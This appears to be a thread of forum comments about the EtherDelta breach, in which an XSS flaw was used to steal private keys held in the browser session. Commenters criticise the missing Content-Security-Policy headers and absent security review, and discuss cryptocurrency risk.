>Thus, users of EtherDelta must enter their public wallet address and private key when using the site, meaning their private key could be captured from the browser session by a malicious code injection.<p>This isn't some sort of fancy cryptocontract based attack. The private key is just stored as a JavaScript object in the session and an attacker found and exploited a reflected XSS vulnerability to send off the key.<p>Even if you're not sending your private key to the server directly surely some people must have made these users aware of the risks they were taking? Not only XSS risks, but risks of a rogue admin or backend compromise injecting malicious JS.
I'm surprised and disappointed that EtherDelta doesn't use Content-Security-Policy headers. They pretty much solve XSS.<p>Google has a good introduction to using them here: <a href="https://csp.withgoogle.com/" rel="nofollow">https://csp.withgoogle.com/</a>
> I want to make one point clear: I believe that EtherDelta, in concept, is safer and more “trustworthy” than a traditional exchange. Everything about how EtherDelta functions is transparent and verifiable by users.... The attack detailed in this piece could have been identified by anyone before it was exploited, and if there had been a security review protocol in place, it would have been easily prevented.<p>Even "in concept", releasing fintech software without doing the security basics verges on professional misconduct.
I read the headline and my immediate guess was cryptocurrency. I clicked and, sure enough, there it was.<p>Maybe it's time to refine some of these ideas? While regular money does get stolen, maybe storing it online isn't the best method? Maybe requiring some human interaction is a good idea?<p>At this point, I can't really justify investing in any cryptocurrency. I'm absolutely unable to justify investing in any ICO.<p>If I opened a contract and my PayPal balance disappeared, I'd be pretty angry and might have some recourse. I'd absolutely have some options if it were with my credit/debit card or directly through my bank.<p>Good luck, folks. I'm still going to maintain the wait-and-see approach.